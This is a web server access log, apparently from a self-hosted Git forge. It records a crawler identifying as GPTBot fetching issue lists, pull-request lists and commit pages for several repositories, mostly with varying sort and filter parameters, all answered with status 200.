https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:17:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi" [Client 74.7.227.38] [Length 62172] [Gzip 14.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" -[17/Feb/2026:17:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fbuild.ninja" [Client 74.7.227.38] [Length 24271] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" -[17/Feb/2026:17:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25495] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" -[17/Feb/2026:17:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:17:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:17:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 19806] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" -[17/Feb/2026:17:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:17:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:17:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12789] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:17:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:17:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:17:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10732] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:17:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 